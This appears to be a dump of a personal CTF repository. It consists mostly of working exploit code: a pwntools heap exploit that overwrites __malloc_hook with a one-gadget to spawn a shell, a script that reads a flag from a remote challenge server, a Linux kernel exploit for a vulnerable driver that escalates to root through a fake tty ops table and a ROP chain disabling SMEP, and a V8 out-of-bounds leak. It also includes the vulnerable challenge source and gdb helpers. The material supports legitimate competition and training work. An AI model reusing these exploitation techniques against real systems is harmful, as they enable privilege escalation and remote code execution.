aslr=False 8 | #context.log_level=True 9 | payload=open("payload",'rb').read() 10 | libc=ELF('./libc.so.6') 11 | 12 | if local==1: 13 | p = process(pc,aslr=aslr,env={'LD_PRELOAD': './libc.so.6'}) 14 | #p = process(pc,aslr=aslr) 15 | gdb.attach(p,'c') 16 | else: 17 | p=remote(remote_addr[0],remote_addr[1]) 18 | 19 | ru = lambda x : p.recvuntil(x) 20 | sn = lambda x : p.send(x) 21 | rl = lambda : p.recvline() 22 | sl = lambda x : p.sendline(x) 23 | rv = lambda x : p.recv(x) 24 | sa = lambda a,b : p.sendafter(a,b) 25 | sla = lambda a,b : p.sendlineafter(a,b) 26 | 27 | def lg(s,addr): 28 | print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr)) 29 | 30 | def raddr(a=6): 31 | if(a==6): 32 | return u64(rv(a).ljust(8,'\x00')) 33 | else: 34 | return u64(rl().strip('\n').ljust(8,'\x00')) 35 | 36 | def choice(idx): 37 | sla("> ",str(idx)) 38 | 39 | def add_entry(name,size,value): 40 | choice(1) 41 | sa(":",name) 42 | sla(":",str(size)) 43 | sa(":",value) 44 | 45 | def edit_entry(name,value): 46 | choice(3) 47 | sa(":",name) 48 | sa(":",value) 49 | 50 | def print_entry(name): 51 | choice(2) 52 | sa(":",name) 53 | 54 | def getcheck(idx): 55 | global payload 56 | res='' 57 | if idx<12: 58 | payloads=os.popen("python more.py "+str(idx)).read().strip('\n') 59 | payloads=payloads.split(' + ') 60 | for i in payloads: 61 | res+=p8(int(i)) 62 | else: 63 | return payload[(idx-12)*6:(idx-12)*6+6] 64 | return res 65 | 66 | if __name__ == '__main__': 67 | thename='\xa1\xf8\xe6\xa9' 68 | a=[] 69 | for i in range(32): 70 | a.append(getcheck(12+i)) 71 | add_entry(a[i],0x10,'123') 72 | add_entry(thename,0x10,'fuckme') 73 | res=0 74 | for i in range(32): 75 | print_entry(a[i]) 76 | if "No such entry!" in rl(): 77 | continue 78 | res+=1<<(12+i) 79 | heap_addr=res+0x500000000000 80 | lg("heap addr",heap_addr) 81 | pl=p64(0)*1+p64(heap_addr+0xc30)+p64(heap_addr+0xd38+(0x1000<<47)) 82 | add_entry(getcheck(5),0x80,pl) 83 | edit_entry(thename,p64(0x2d1)) 84 | add_entry('1234',0x300,'1234') 85 | print_entry(thename) 86 | ru("Value: ") 87 | rv(16) 88 | libc_addr=raddr()-0x3c4e18 89 | lg("libc_addr",libc_addr) 90 | libc.address=libc_addr 91 | pl=p64(0x21)+'1234\x00\x00\x00\x00'+p64(0)*4+p64(heap_addr+0xd40)+p64(libc.symbols['__malloc_hook']+(0x8<<48)) 92 | edit_entry(thename,pl) 93 | edit_entry('1234',p64(libc.address+0xf1147)) 94 | p.interactive() 95 | -------------------------------------------------------------------------------- /2018/teaserDrangon/fastStorage/faststorage: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Changochen/CTF/f8f2856acbfefb5fe664a0aacd7c80c49d9b5757/2018/teaserDrangon/fastStorage/faststorage -------------------------------------------------------------------------------- /2018/teaserDrangon/fastStorage/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Changochen/CTF/f8f2856acbfefb5fe664a0aacd7c80c49d9b5757/2018/teaserDrangon/fastStorage/libc.so.6 -------------------------------------------------------------------------------- /2018/teaserDrangon/fastStorage/more.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # coding=utf-8 3 | from z3 import * 4 | import sys 5 | s = Solver() 6 | a = BitVec("a", 32) 7 | b = BitVec("b", 32) 8 | c = BitVec("c", 32) 9 | d = BitVec("d", 32) 10 | e = BitVec("e", 32) 11 | f = BitVec("f", 32) 12 | 13 | g = BitVec("g", 32) 14 | h = BitVec("h", 32) 15 | 16 | i = BitVec("i", 32) 17 | 18 | i=(((((0x1337*a+1)*b+1)*c+1)*d+1)*g+1)*h+1 19 | s.add(a<256,b<256,c<256,d<256,g<256,h<256,i<=0x7eFFFFFF) 20 | s.add(a>0,b>0,c>0,d>0,g>0,h>0,i>0) 21 | 22 | tmp=int(sys.argv[1]) 23 | if(tmp>=32): 24 | s.add(i%62==61) 25 | tmp-=32 26 | else: 27 | s.add((i+2)%62==0) 28 | 29 | e=((b<<8)+a)^((d<<8)+c)^((h<<8)+g) 30 | s.add((((e >> 10) ^((e ^ (e >> 5))&0xFF))&0x1f)==tmp) 31 | f=0 32 | for w in range(8): 33 | f=f+((a>>w)&0x1) 34 | f=f+((b>>w)&0x1) 35 | f=f+((c>>w)&0x1) 36 | f=f+((d>>w)&0x1) 37 | f=f+((g>>w)&0x1) 38 | f=f+((h>>w)&0x1) 39 | 40 | s.add((f&0x1f)==tmp) 41 | 42 | if(s.check()): 43 | m=s.model() 44 | print(m[a]+m[b]+m[c]+m[d]+m[g]+m[h]) 45 | -------------------------------------------------------------------------------- /2018/teaserDrangon/production/lyrics.cc: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | 15 | namespace globals { 16 | std::vector records; 17 | } // namespace globals 18 | 19 | static void set_limits() { 20 | struct rlimit rlim; 21 | 22 | rlim.rlim_cur = rlim.rlim_max = 0; 23 | setrlimit(RLIMIT_CORE, &rlim); 24 | 25 | rlim.rlim_cur = rlim.rlim_max = 2; 26 | setrlimit(RLIMIT_CPU, &rlim); 27 | 28 | rlim.rlim_cur = rlim.rlim_max = 64 * 1024; 29 | setrlimit(RLIMIT_FSIZE, &rlim); 30 | 31 | rlim.rlim_cur = rlim.rlim_max = 32; 32 | setrlimit(RLIMIT_NOFILE, &rlim); 33 | } 34 | 35 | static void welcome() { 36 | printf("Welcome to the Lyrics Explorer!\n"); 37 | } 38 | 39 | static ssize_t read_line(int fd, char *buffer, size_t size) { 40 | ssize_t bytes_read = 0; 41 | while (size > 0) { 42 | char c; 43 | ssize_t ret = read(fd, &c, 1); 44 | 45 | if (ret <= 0) { 46 | break; 47 | } else if (c == '\n') { 48 | *buffer = '\0'; 49 | break; 50 | } 51 | 52 | *buffer++ = c; 53 | bytes_read++; 54 | size--; 55 | } 56 | 57 | return bytes_read; 58 | } 59 | 60 | static ssize_t read_line_buffered(int fd, char *buffer, size_t size) { 61 | if (size == 0) { 62 | return -1; 63 | } 64 | 65 | ssize_t ret = read(fd, buffer, size - 1); 66 | 67 | if (ret <= 0) { 68 | return ret; 69 | } 70 | 71 | buffer[ret] = '\0'; 72 | 73 | for (ssize_t i = 0; i < ret; i++) { 74 | if (buffer[i] == '\0') { 75 | buffer[i] = '.'; 76 | } else if (buffer[i] == '\n') { 77 | buffer[i] = '\0'; 78 | lseek(fd, -(ret - i - 1), SEEK_CUR); 79 | return i; 80 | } 81 | } 82 | 83 | return ret; 84 | } 85 | 86 | static int load_int() { 87 | char buffer[32] = { 0 }; 88 | 89 | ssize_t bytes_read = read_line(STDIN_FILENO, buffer, sizeof(buffer)); 90 | if (bytes_read <= 0) { 91 | return 0; 92 | } 93 | 94 | return atoi(buffer); 95 | } 96 | 97 | static bool sanitize_path(char *buffer) { 98 | if (strstr(buffer, "../") != NULL) { 99 | return false; 100 | } 101 | 102 | return true; 103 | } 104 | 105 | static bool list_files(const char *path, std::vector *files) { 106 | files->clear(); 107 | 108 | DIR *dir; 109 | struct dirent *ent; 110 | if ((dir = opendir (path)) != NULL) { 111 | while ((ent = readdir (dir)) != NULL) { 112 | if (!strcmp(ent->d_name, ".") || !strcmp(ent->d_name, "..")) { 113 | continue; 114 | } 115 | 116 | files->push_back(ent->d_name); 117 | } 118 | closedir (dir); 119 | return true; 120 | } else { 121 | perror ("[-] Error"); 122 | return false; 123 | } 124 | } 125 | 126 | static bool list_bands() { 127 | std::vector bands; 128 | if (!list_files("./data", &bands)) { 129 | return false; 130 | } 131 | 132 | for (const auto& band : bands) { 133 | printf("%s\n", band.c_str()); 134 | } 135 | 136 | return true; 137 | } 138 | 139 | static bool list_songs() { 140 | char buffer[32] = { /* zero padding */ }; 141 | 142 | printf("Band: "); 143 | read_line(STDIN_FILENO, buffer, sizeof(buffer)); 144 | 145 | // Never trust user input!! 146 | if (!sanitize_path(buffer)) { 147 | printf("[-] Nice try!\n"); 148 | return false; 149 | } 150 | 151 | char path[48] = "./data/"; 152 | strncat(path, buffer, sizeof(path) - 7); 153 | 154 | std::vector songs; 155 | if (!list_files(path, &songs)) { 156 | return false; 157 | } 158 | 159 | for (const auto& song : songs) { 160 | printf("%s\n", song.c_str()); 161 | } 162 | 163 | return true; 164 | } 165 | 166 | static bool open_lyrics() { 167 | // Don't allow opening too many lyrics at once. 168 | if (globals::records.size() >= 16) { 169 | return false; 170 | } 171 | 172 | // Load and sanitize user input. 173 | char band[32]; 174 | printf("Band: "); 175 | read_line(STDIN_FILENO, band, sizeof(band)); 176 | 177 | char song[32]; 178 | printf("Song: "); 179 | read_line(STDIN_FILENO, song, sizeof(song)); 180 | 181 | // Hackers these days... 182 | if (!sanitize_path(band) || !sanitize_path(song)) { 183 | printf("[-] Nice try!\n"); 184 | return false; 185 | } 186 | 187 | // Form the final path of the lyrics in our database. 188 | char path[128]; 189 | snprintf(path, sizeof(path), "./data/%s/%s", band, song); 190 | 191 | // Open the path, make sure that it's a file (and not e.g. directory), and 192 | // save the file descriptor. 193 | int fd1 = open(path, O_RDONLY); 194 | if (fd1 == -1) { 195 | return false; 196 | } 197 | 198 | struct stat st; 199 | if (fstat(fd1, &st) != 0 || !S_ISREG(st.st_mode)) { 200 | return false; 201 | } 202 | 203 | globals::records.push_back(fd1); 204 | 205 | // Better safe then sorry. Make sure that the path also doesn't point to a 206 | // symbolic link. 207 | int fd2 = open(path, O_RDONLY | O_NOFOLLOW); 208 | if (fd2 == -1) { 209 | printf("[-] Detected attempt to open a symbolic link!\n"); 210 | 211 | // Some kind of attack detected? 212 | return true; 213 | } 214 | close(fd2); 215 | 216 | // Extra check to protect the flag. 217 | if (strstr(path, "flag") != NULL) { 218 | printf("[-] Not today\n"); 219 | 220 | close(globals::records.back()); 221 | globals::records.pop_back(); 222 | return false; 223 | } 224 | 225 | printf("[+] Opened the lyrics as new record %zu\n", 226 | globals::records.size() - 1); 227 | 228 | return true; 229 | } 230 | 231 | static bool read_lyrics() { 232 | printf("Record ID: "); 233 | int idx = load_int(); 234 | 235 | if (idx < 0 || idx >= globals::records.size()) { 236 | return false; 237 | } 238 | 239 | char buffer[4096]; 240 | ssize_t bytes_read = read_line_buffered(globals::records[idx], 241 | buffer, sizeof(buffer)); 242 | 243 | // Let's make sure we're not disclosing any sensitive data due to potential 244 | // bugs in the program. 245 | if (bytes_read > 0) { 246 | if (strstr(buffer, "DrgnS")) { 247 | printf("[-] Attack detected and stopped!\n"); 248 | 249 | assert(close(globals::records[idx]) == 0); 250 | memmove(&globals::records[idx], &globals::records[idx + 1], 251 | (globals::records.size() - idx - 1) * sizeof(int)); 252 | globals::records.pop_back(); 253 | return true; 254 | } 255 | } 256 | 257 | printf("%s\n", buffer); 258 | return true; 259 | } 260 | 261 | static bool write_lyrics() { 262 | // This feature is not fully tested, let's hope that it works... 263 | 264 | printf("Record ID: "); 265 | int idx = load_int(); 266 | 267 | if (idx < 0 || idx >= globals::records.size()) { 268 | return false; 269 | } 270 | 271 | printf("Data length: "); 272 | int length = load_int(); 273 | 274 | if (length < 0 || length > 1024) { 275 | return false; 276 | } 277 | 278 | char buffer[1024]; 279 | printf("Data: "); 280 | size_t bytes_read = read(STDIN_FILENO, buffer, length); 281 | 282 | assert(bytes_read == length); 283 | 284 | if (write(globals::records[idx], buffer, bytes_read) != bytes_read) { 285 | return false; 286 | } 287 | 288 | return true; 289 | } 290 | 291 | static bool close_record() { 292 | printf("Record ID: "); 293 | int idx = load_int(); 294 | 295 | if (idx < 0 || idx >= globals::records.size()) { 296 | return false; 297 | } 298 | 299 | close(globals::records[idx]); 300 | memmove(&globals::records[idx], &globals::records[idx + 1], 301 | (globals::records.size() - idx - 1) * sizeof(int)); 302 | globals::records.pop_back(); 303 | 304 | return true; 305 | } 306 | 307 | int main() { 308 | // Disable stdout/stderr buffering. 309 | setbuf(stdout, NULL); 310 | setbuf(stderr, NULL); 311 | 312 | // Set some safe limits on the resources used by the process. 313 | set_limits(); 314 | 315 | // Print the welcome message. 316 | welcome(); 317 | 318 | // Main program loop. 319 | while (1) { 320 | char buffer[32] = { 0 }; 321 | 322 | printf("Command> "); 323 | read_line(STDIN_FILENO, buffer, sizeof(buffer)); 324 | 325 | if (!strcmp(buffer, "bands")) { 326 | if (!list_bands()) { 327 | break; 328 | } 329 | } else if (!strcmp(buffer, "songs")) { 330 | if (!list_songs()) { 331 | break; 332 | } 333 | } else if (!strcmp(buffer, "open")) { 334 | if (!open_lyrics()) { 335 | break; 336 | } 337 | } else if (!strcmp(buffer, "read")) { 338 | if (!read_lyrics()) { 339 | break; 340 | } 341 | } else if (!strcmp(buffer, "write")) { 342 | if (!write_lyrics()) { 343 | break; 344 | } 345 | } else if (!strcmp(buffer, "close")) { 346 | if (!close_record()) { 347 | break; 348 | } 349 | } else if (!strcmp(buffer, "exit")) { 350 | break; 351 | } else { 352 | printf("[-] Unknown command\n"); 353 | break; 354 | } 355 | } 356 | 357 | printf("Bye!\n"); 358 | 359 | return 0; 360 | } 361 | -------------------------------------------------------------------------------- /2018/teaserDrangon/production/lyrics.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | remote_addr=['lyrics.hackable.software',4141] 4 | #context.log_level=True 5 | 6 | p=remote(remote_addr[0],remote_addr[1]) 7 | 8 | ru = lambda x : p.recvuntil(x) 9 | sn = lambda x : p.send(x) 10 | rl = lambda : p.recvline() 11 | sl = lambda x : p.sendline(x) 12 | rv = lambda x : p.recv(x) 13 | sa = lambda a,b : p.sendafter(a,b) 14 | sla = lambda a,b : p.sendlineafter(a,b) 15 | 16 | def cmd(command): 17 | sla("> ",command) 18 | 19 | def bands(): 20 | cmd("bands") 21 | 22 | def songs(band): 23 | cmd("songs") 24 | sla("Band: ",band) 25 | 26 | def _open(band,song): 27 | cmd("open") 28 | sla("Band: ",band) 29 | sla("Song: ",song) 30 | 31 | def _read(idx): 32 | cmd("read") 33 | sla("ID: ",str(idx)) 34 | 35 | def _write(idx,content): 36 | cmd("write") 37 | sla("ID: ",str(idx)) 38 | sla("length: ",str(len(content)+1)) 39 | sa(": ",content) 40 | 41 | def _close(idx): 42 | cmd("close") 43 | sla("ID: ",str(idx)) 44 | 45 | if __name__ == '__main__': 46 | for i in xrange(16): 47 | _open("..",'lyrics') 48 | 49 | for i in xrange(16): 50 | for j in xrange(24): 51 | _read(0) 52 | 53 | for i in xrange(12): 54 | _open('The Beatles','Girl') 55 | 56 | _open("..",'flag') 57 | for i in xrange(31): 58 | _read(0) 59 | _read(12) 60 | _read(0) 61 | p.interactive() 62 | -------------------------------------------------------------------------------- /2019/*ctf/Chrome.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Changochen/CTF/f8f2856acbfefb5fe664a0aacd7c80c49d9b5757/2019/*ctf/Chrome.tar.gz -------------------------------------------------------------------------------- /2019/0ctf/plang.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Changochen/CTF/f8f2856acbfefb5fe664a0aacd7c80c49d9b5757/2019/0ctf/plang.zip -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # CTF 2 | Some writeup of the CTF challenges I solved 3 | -------------------------------------------------------------------------------- /tmp/babydriver.tar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Changochen/CTF/f8f2856acbfefb5fe664a0aacd7c80c49d9b5757/tmp/babydriver.tar -------------------------------------------------------------------------------- /tmp/exp.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #define CRED_SIZE 0xa8 10 | #define TTY_STRUCT_SIZE 0x2e0 11 | #define PTMX "/dev/ptmx" 12 | 13 | typedef int __attribute__((regparm(3))) (*_commit_creds)(unsigned long cred); 14 | typedef unsigned long __attribute__((regparm(3))) (*_prepare_kernel_cred)(unsigned long cred); 15 | _commit_creds __commit_creds = 0xffffffff810a1420; 16 | _prepare_kernel_cred __prepare_kernel_cred = 0xffffffff810a1810; 17 | 18 | unsigned long user_cs, user_ss, user_eflags; 19 | 20 | unsigned long write_cr4 = 0xffffffff810635b4; 21 | //unsigned long write_cr4 = 0xffffffff810635b0; 22 | unsigned long poprdiret = 0xffffffff810d238d; 23 | unsigned long xchgeaxesp = 0xffffffff81007808; 24 | unsigned long stack ; 25 | int fd_array[0x20]; 26 | 27 | void save_user_state(){ 28 | asm( 29 | "movq %%cs, %0\n" 30 | "movq %%ss, %1\n" 31 | "pushfq\n" 32 | "popq %2\n" 33 | : "=r"(user_cs), "=r"(user_ss), "=r"(user_eflags) 34 | : 35 | : "memory" 36 | ); 37 | } 38 | 39 | void get_shell(){ 40 | system("/bin/sh"); 41 | } 42 | void get_root(){ 43 | __commit_creds(__prepare_kernel_cred(0)); 44 | asm( 45 | "swapgs\n" 46 | "movq %0,%%rax\n" // push things into stack for iretq 47 | "pushq %%rax\n" 48 | "movq %1,%%rax\n" 49 | "pushq %%rax\n" 50 | "movq %2,%%rax\n" 51 | "pushq %%rax\n" 52 | "movq %3,%%rax\n" 53 | "pushq %%rax\n" 54 | "movq %4,%%rax\n" 55 | "pushq %%rax\n" 56 | "iretq\n" 57 | : 58 | :"r"(user_ss),"r"(stack - 0x808 + 0x2000),"r"(user_eflags),"r"(user_cs),"r"(get_shell) 59 | :"memory" 60 | ); 61 | } 62 | 63 | int main(){ 64 | int fd1, fd2; 65 | 66 | char buffer[0x20]; 67 | long fake_ops[0x30]; 68 | memset(fake_ops, 0, sizeof(fake_ops)); 69 | fake_ops[12] = xchgeaxesp; 70 | fd1 = open("/dev/babydev", O_RDWR); 71 | fd2 = open("/dev/babydev", O_RDWR); 72 | 73 | ioctl(fd1, 0x10001, TTY_STRUCT_SIZE); 74 | close(fd1); 75 | 76 | for(int i = 0; i < 0x20; i++){ 77 | fd_array[i] = open(PTMX, O_RDWR); 78 | } 79 | 80 | read(fd2, buffer, 0x20); 81 | *((long*)(buffer+0x18)) = (long)fake_ops; 82 | write(fd2, buffer, 0x20); 83 | 84 | stack = xchgeaxesp & 0xFFFFFFFF; 85 | unsigned long res = 0; 86 | if(mmap(stack - 0x808, 0x6000, 7, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) != (stack-0x808)){ 87 | puts("Mmap failed!"); 88 | exit(0); 89 | } 90 | 91 | unsigned long rop_chain[] ={ 92 | poprdiret, 93 | 0x6f0, 94 | write_cr4, 95 | stack- 0x808 + 0x4000, 96 | (unsigned long)get_root, 97 | 98 | }; 99 | memcpy(stack, rop_chain, sizeof(rop_chain)); 100 | getchar(); 101 | 102 | save_user_state(); 103 | for(int i = 0; i< 0x20; i++){ 104 | ioctl(fd_array[i], 0xdeadbeef, 0xcafebabe); 105 | } 106 | 107 | return 0; 108 | } 109 | -------------------------------------------------------------------------------- /tmp/gdbinit: -------------------------------------------------------------------------------- 1 | # Copyright 2014 the V8 project authors. All rights reserved. 2 | # Use of this source code is governed by a BSD-style license that can be 3 | # found in the LICENSE file. 4 | 5 | # Print tagged object. 6 | define job 7 | call (void) _v8_internal_Print_Object((void*)($arg0)) 8 | end 9 | document job 10 | Print a v8 JavaScript object 11 | Usage: job tagged_ptr 12 | end 13 | 14 | # Print content of v8::internal::Handle. 15 | define jh 16 | call (void) _v8_internal_Print_Object(*((v8::internal::Object**)($arg0).location_)) 17 | end 18 | document jh 19 | Print content of a v8::internal::Handle 20 | Usage: jh internal_handle 21 | end 22 | 23 | # Print content of v8::Local handle. 24 | define jlh 25 | call (void) _v8_internal_Print_Object(*((v8::internal::Object**)($arg0).val_)) 26 | end 27 | document jlh 28 | Print content of a v8::Local handle 29 | Usage: jlh local_handle 30 | end 31 | 32 | # Print Code objects containing given PC. 33 | define jco 34 | call (void) _v8_internal_Print_Code((void*)($arg0)) 35 | end 36 | document jco 37 | Print a v8 Code object from an internal code address 38 | Usage: jco pc 39 | end 40 | 41 | # Print LayoutDescriptor. 42 | define jld 43 | call (void) _v8_internal_Print_LayoutDescriptor((void*)($arg0)) 44 | end 45 | document jld 46 | Print a v8 LayoutDescriptor object 47 | Usage: jld tagged_ptr 48 | end 49 | 50 | # Print TransitionTree. 51 | define jtt 52 | call (void) _v8_internal_Print_TransitionTree((void*)($arg0)) 53 | end 54 | document jtt 55 | Print the complete transition tree of the given v8 Map. 56 | Usage: jtt tagged_ptr 57 | end 58 | 59 | # Print JavaScript stack trace. 60 | define jst 61 | call (void) _v8_internal_Print_StackTrace() 62 | end 63 | document jst 64 | Print the current JavaScript stack trace 65 | Usage: jst 66 | end 67 | 68 | # Skip the JavaScript stack. 69 | define jss 70 | set $js_entry_sp=v8::internal::Isolate::Current()->thread_local_top()->js_entry_sp_ 71 | set $rbp=*(void**)$js_entry_sp 72 | set $rsp=$js_entry_sp + 2*sizeof(void*) 73 | set $pc=*(void**)($js_entry_sp+sizeof(void*)) 74 | end 75 | document jss 76 | Skip the jitted stack on x64 to where we entered JS last. 77 | Usage: jss 78 | end 79 | 80 | # Print stack trace with assertion scopes. 81 | define bta 82 | python 83 | import re 84 | frame_re = re.compile("^#(\d+)\s*(?:0x[a-f\d]+ in )?(.+) \(.+ at (.+)") 85 | assert_re = re.compile("^\s*(\S+) = .+") 86 | btl = gdb.execute("backtrace full", to_string = True).splitlines() 87 | for l in btl: 88 | match = frame_re.match(l) 89 | if match: 90 | print("[%-2s] %-60s %-40s" % (match.group(1), match.group(2), match.group(3))) 91 | match = assert_re.match(l) 92 | if match: 93 | if match.group(3) == "false": 94 | prefix = "Disallow" 95 | color = "\033[91m" 96 | else: 97 | prefix = "Allow" 98 | color = "\033[92m" 99 | print("%s -> %s %s (%s)\033[0m" % (color, prefix, match.group(2), match.group(1))) 100 | end 101 | end 102 | document bta 103 | Print stack trace with assertion scopes 104 | Usage: bta 105 | end 106 | 107 | # Search for a pointer inside all valid pages. 108 | define space_find 109 | set $space = $arg0 110 | set $current_page = $space->first_page() 111 | while ($current_page != 0) 112 | printf "# Searching in %p - %p\n", $current_page->area_start(), $current_page->area_end()-1 113 | find $current_page->area_start(), $current_page->area_end()-1, $arg1 114 | set $current_page = $current_page->next_page() 115 | end 116 | end 117 | 118 | define heap_find 119 | set $heap = v8::internal::Isolate::Current()->heap() 120 | printf "# Searching for %p in old_space ===============================\n", $arg0 121 | space_find $heap->old_space() ($arg0) 122 | printf "# Searching for %p in map_space ===============================\n", $arg0 123 | space_find $heap->map_space() $arg0 124 | printf "# Searching for %p in code_space ===============================\n", $arg0 125 | space_find $heap->code_space() $arg0 126 | end 127 | document heap_find 128 | Find the location of a given address in V8 pages. 129 | Usage: heap_find address 130 | end 131 | 132 | set disassembly-flavor intel 133 | set disable-randomization off 134 | 135 | # Install a handler whenever the debugger stops due to a signal. It walks up the 136 | # stack looking for V8_Dcheck and moves the frame to the one above it so it's 137 | # immediately at the line of code that triggered the DCHECK. 138 | python 139 | def dcheck_stop_handler(event): 140 | frame = gdb.selected_frame() 141 | select_frame = None 142 | message = None 143 | count = 0 144 | # limit stack scanning since they're usually shallow and otherwise stack 145 | # overflows can be very slow. 146 | while frame is not None and count < 5: 147 | count += 1 148 | if frame.name() == 'V8_Dcheck': 149 | frame_message = gdb.lookup_symbol('message', frame.block())[0] 150 | if frame_message: 151 | message = frame_message.value(frame).string() 152 | select_frame = frame.older() 153 | break 154 | if frame.name() is not None and frame.name().startswith('V8_Fatal'): 155 | select_frame = frame.older() 156 | frame = frame.older() 157 | 158 | if select_frame is not None: 159 | select_frame.select() 160 | gdb.execute('frame') 161 | if message: 162 | print('DCHECK error: {}'.format(message)) 163 | 164 | gdb.events.stop.connect(dcheck_stop_handler) 165 | end 166 | -------------------------------------------------------------------------------- /tmp/neo.js: -------------------------------------------------------------------------------- 1 | // 2 | // Union{ 3 | // unsigned int u32[2]; 4 | // double f64; 5 | // } 6 | function gc(){ 7 | for(let i = 0 ; i < 0x10; i++){ 8 | new ArrayBuffer(0x1000000); 9 | } 10 | } 11 | 12 | var f64 = new Float64Array(1); 13 | var u32 = new Uint32Array(f64.buffer); 14 | 15 | function d2u(v){ 16 | f64[0] = v; 17 | return u32; 18 | } 19 | 20 | function u2d(lo, hi){ 21 | u32[0] = lo; 22 | u32[1] = hi; 23 | return f64[0]; 24 | } 25 | 26 | function hex(lo, hi){ 27 | if(lo == 0 ){ 28 | return "0x" + hi.toString(16) + "-00000000"; 29 | } 30 | 31 | if(hi == 0){ 32 | return "0x" + lo.toString(16); 33 | } 34 | 35 | return "0x" + hi.toString(16) + "-" + lo.toString(16); 36 | } 37 | 38 | var a = [1.1,2.2]; 39 | var oob_val = a.oob(); 40 | var leak_val = d2u(oob_val); 41 | console.log("[-] leaked value: " + hex(leak_val[0], leak_val[1])); 42 | -------------------------------------------------------------------------------- /tmp/x64.release.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Changochen/CTF/f8f2856acbfefb5fe664a0aacd7c80c49d9b5757/tmp/x64.release.zip --------------------------------------------------------------------------------